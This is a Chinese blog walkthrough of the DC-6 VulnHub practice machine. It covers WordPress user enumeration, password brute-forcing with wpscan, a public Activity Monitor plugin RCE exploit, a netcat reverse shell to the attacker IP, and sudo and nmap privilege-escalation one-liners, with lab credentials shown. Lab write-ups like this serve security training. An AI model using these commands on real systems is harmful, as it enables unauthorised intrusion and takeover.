当前位置:网站首页>DC-6--vulnhub靶场
DC-6--vulnhub靶场
2022-07-26 00:15:00 【逆风/】
靶场下载地址
靶场线索:
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
kali解压
gzip -d rockyou.txt.gz
主机发现

发现重定向,修改hosts文件
vim /etc/hosts

网站探测

wordpress,并提到了插件与安全
爆破用户
wpscan --url http://wordy/ -e u

保存 ,使用线索的密码字典爆破
wpscan --url http://wordy/ -P /root/桌面/passwords.txt -U /root/桌面/user.txt
Username: mark, Password: helpdesk01
登录后台网址
http://wordy/wp-login.php
来到后台后,发现插件activity monitor,试试有无漏洞
getshell
searchsploit activity monitor

远程代码执行漏洞,下载到当前路径
searchsploit -m php/webapps/50110.py
执行
python3 50110.py
执行后需要输入目标ip地址和后台登录的账号密码,执行成功后会返回一个shell
nc -lvvp 4444
nc -e /bin/bash 192.168.194.156 4444

获取交互shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’
提权
参考
来到home目录,在mark/stuff中找到一个things-to-do.txt,得到
用户 graham
密码GSo7isUM1D4
切换用户
[email protected]:/home/mark/stuff$ su graham
su graham
Password: GSo7isUM1D4
看下能做什么
[email protected]:/home/jens$ sudo -l
sudo -l
Matching Defaults entries for graham on dc-6:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User graham may run the following commands on dc-6:
(jens) NOPASSWD: /home/jens/backups.sh
向backups.sh文件中写入”/bin/bash”,并以jens用户去执行该脚本
echo “/bin/bash” >> backups.sh
sudo -u jens ./backups.sh
执行成功后,切换到了jens用户
该用户可以执行nmap,可以通过namp提权
echo 'os.execute("/bin/sh")' >getShell
sudo nmap --script=getShell

总结
提权过程不熟悉
边栏推荐
- 融合聚类信息的技术主题图可视化方法研究
- Find and locate commands
- What is Web3 game?
- P4047 [JSOI2010]部落划分
- YOLOV3
- Linked list related methods
- 基于数据要素流通视角的数据溯源研究进展
- Study on bovine serum protein modified phenolic acids and alkaloids small molecules / coupled microspheres protein / bovine erythrocyte SOD
- 12. Neural network model
- 2022/7/19 考试总结
猜你喜欢

分布式事务 :可靠消息最终一致性方案

Leetcode high frequency question 66. add one, give you an array to represent numbers, then add one to return the result

牛血清白蛋白修饰牛红细胞超氧化物歧化酶SOD/叶酸偶联2-ME白蛋白纳米粒的制备

letfaw

基于网络分析和文本挖掘的意见领袖影响力研究
![[英雄星球七月集训LeetCode解题日报] 第25日 树状数组](/img/e6/a59a1719c4381772ce7475d59d5068.png)
[英雄星球七月集训LeetCode解题日报] 第25日 树状数组

Research progress of data traceability based on the perspective of data element circulation

FreeRTOS personal notes - mutex

Study on gene targeting preparation of tissue plasminogen activator loaded on albumin nano ultrasonic microbubbles

为了拿捏 Redis 数据结构,我画了 40 张图(完整版)
随机推荐
The bull market is not over yet, and there is still 2021-05-18 in the second half
FreeRTOS personal notes - mutex
Matlab makes the image of serial port output data in real time
滑动窗口_
OPENCV学习DAY6
The way to understand JS: six common inheritance methods of JS
JVM Tri Color marking and read-write barrier
Thymeleaf view integration
Tarjan 求强连通分量 O(n+m) ,缩点
Four characteristics and isolation level of MySQL transactions
How long can this bull market last Answers to questions 2021-05-11
PC website realizes wechat code scanning login function (II)
Sorting out the encapsulation classes of control elements in appium
一个List到底能存多大的数据呢?
京东获取推荐商品列表 API
Preparation of bovine erythrocyte superoxide dismutase sod/ folic acid coupled 2-ME albumin nanoparticles modified by bovine serum albumin
LCA 三种姿势(倍增,Tarjan+并查集,树链剖分)
Jd.com API for obtaining recommended product list
牛血清蛋白修饰酚酸类及生物碱类小分子/偶联微球的蛋白/牛红细胞SOD的研究
letfaw